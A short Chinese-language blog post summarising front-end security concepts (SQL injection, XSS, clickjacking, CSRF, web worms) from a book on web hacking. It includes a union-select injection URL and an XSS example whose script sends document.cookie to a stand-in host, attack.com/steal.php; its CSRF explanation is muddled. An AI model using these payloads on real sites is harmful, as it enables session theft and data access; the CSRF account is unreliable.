前端 安全 問題

看了一本書《Web前端黑客技術揭祕》，講了不少的前端安全性問題，這裏總結下常見的！不是挨個講解，只是講一下概念。

一、SQL注入攻擊

一個例子說明一切：

訪問：http://www.demo.com/demo.php?id=1  

=> select * from user_table where id=1

訪問：http://www.demo.com/demo.php?id=1 union select * from user_table  

=> select * from user_table where id=1 union select * from user_table.

二、XSS跨站腳本攻擊

舉個例子：

訪問：http://www.demo.com/demo.php#document.write("<script/src=www.attack.com/alert.js></script>");

alert.js

new Image().src="http://www.attack.com/steal.php?data="+escape(document.cookie);

就是爲了獲取珍貴的Cookie，還要注意HttpOnly cookie 的溢出泄露。

三、前端頁面劫持

分點擊劫持、拖放劫持、觸屏劫持三種。

這個道理也很簡單，就是講一個須要用戶點擊或其餘操做的頁面使用iframe標籤引到當前頁面，可是其他部分都被遮擋住，而後只暴露出須要用戶點擊或其餘操做的部分，而且引導用戶進行操做。從而得到用戶客戶端的各類數據，利用數據完成一些操做。

四、CSRF跨站請求僞造

CSPR攻擊和XSS攻擊的不一樣之處在於它是要用戶到一個黑客構建好的攻擊網站上，從而被得到Cookie。

五、Web蠕蟲問題

蠕蟲程序就是利用Web2.0用戶只交的交流這一個特色作的。

經典例子：某人發表了一個東西，若是另外一個用戶發現並點開了。這個蠕蟲程序便使用點擊人的信息再次發送一條相同信息，依次擴展，指數增加！

用處：對用數據進行惡意操做，拒絕服務攻擊，分佈式拒絕服務攻擊，散播廣告，散播網頁木馬，傳播輿情等。

其餘：注意同源策略，網絡上的信任與不信任，社會工程學的應用。